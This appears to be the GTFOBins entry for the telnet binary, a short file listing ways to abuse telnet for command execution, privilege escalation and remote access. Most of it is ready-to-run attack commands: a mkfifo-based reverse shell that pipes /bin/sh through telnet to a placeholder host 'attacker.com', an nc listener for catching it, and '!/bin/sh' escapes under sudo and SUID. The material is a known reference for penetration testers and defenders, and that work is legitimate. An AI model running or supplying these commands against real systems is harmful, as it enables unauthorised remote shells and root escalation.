GTFOBins.github.io/_gtfobins/telnet.md
2018-05-28 17:48:26 +02:00

907 B

functions
execute-interactive reverse-shell-interactive sudo-enabled suid-limited
description code
BSD version only. Needs to be connected first. RHOST=attacker.com RPORT=12345 telnet $RHOST $RPORT ^] !/bin/sh
description code
Run `nc -l -p 12345` on the attacker box to receive the shell. RHOST=attacker.com RPORT=12345 TF=$(mktemp) rm $TF mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
description code
BSD version only. Needs to be connected first. RHOST=attacker.com RPORT=12345 sudo telnet $RHOST $RPORT ^] !/bin/sh
description code
BSD version only. Needs to be connected first. RHOST=attacker.com RPORT=12345 ./telnet $RHOST $RPORT ^] !/bin/sh